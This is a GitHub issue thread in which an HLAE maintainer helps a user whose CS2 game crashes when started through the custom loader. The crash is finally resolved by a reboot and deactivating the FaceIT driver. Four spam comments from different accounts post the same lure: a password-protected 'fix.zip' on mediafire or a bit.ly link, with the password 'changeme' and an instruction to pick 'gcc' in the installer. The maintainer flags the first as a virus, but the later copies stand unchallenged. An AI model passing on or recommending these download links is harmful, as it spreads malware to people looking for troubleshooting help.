### ISSUE TITLE
CS2 crashing when opening with custom loader

### ISSUE THREAD

**Issue by torkin-webdesign** [ripieces/advancedfx#980]
Hi everyone, 

Since i try to use HLAE, my game won't open when using custom loader. A CS2 window open, i see the workshop tool loading and than, game stop, nothing more happen. Same thing when using LHM.GG to start via the app button !

Thanks for your help.

**Comment by dtugend** [comment]
Please provide a screenshot / notes of your custom loader settings.
Also make sure that the game is fully updated and launch it at least once without HLAE from Steam.

**Comment by torkin-webdesign** [comment]
![image](https://github.com/user-attachments/assets/97d72102-da33-468d-b868-4c4ac954478e)

My game is up to date, work fine without HLAE. I verify all the files one, uninstall and reinstall the game too !

**Comment by dtugend** [comment]
1. please empty the bottom box where it says Add environment variables
2. Please let us know the exact HLAE version you are using (it's noted in the title bar of the main program window).

**Comment by torkin-webdesign** [comment]
2.171.0.0 is the version. I try removing all the environment variables and the same issue occur.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dtugend** [comment]
The (now deleted) message above is a virus, don't do it

**Comment by torkin-webdesign** [comment]
good ! it was supect to me too !

**Comment by dtugend** [comment]
1. Have you started the game at least once without HLAE?
2. Can you add -insecure to the Steam launch options of CS2, if it crashes then too it's usually an overlay tool (e.g. Razer) or Anti Cheat (FaceIt) or similar tool causing the crash.

**Comment by torkin-webdesign** [comment]
Good. Let me try that !

**Comment by dtugend** [comment]
Please note, that closing FaceIT AntiCheat GUI is not enough, you need to end the FaceIT service from the option when you right click the GUI Tray Icon (lasts until next reboot).

**Comment by torkin-webdesign** [comment]
Still no luck unfortunalty

**Comment by dtugend** [comment]
What was the result of 2 (start from steam with -insecure in command line)?
we have a discord linked on https://www.advancedfx.org/support/ if that'S easier for you than here.

**Comment by dtugend** [comment]
![image](https://github.com/user-attachments/assets/10dff6dd-c180-4479-8f9a-425c3381eff0)
Do you have the CS2 WorkShop Tools DLC installed?

**Comment by torkin-webdesign** [comment]
I can start CS2 via steam with the -insecure command line!

**Comment by torkin-webdesign** [comment]
And yes, i have the workshop tool installed

**Comment by dtugend** [comment]
- Can you tell me the size of the file `C:\Program Files (x86)\HLAE\x64\AfxHookSource2.dll` in bytes? (it should be 4.037.632 bytes, the smaller of the two numbers)?
- Can you add `-tools -noassetbrowser` to the Steam Launch options / Launch at least once the workshop tools without HLAE before trying HLAE again)?

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dtugend** [comment]
reboot fixed + after that "Deactivate Driver" in faceit tray icon gui fixed the issue

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
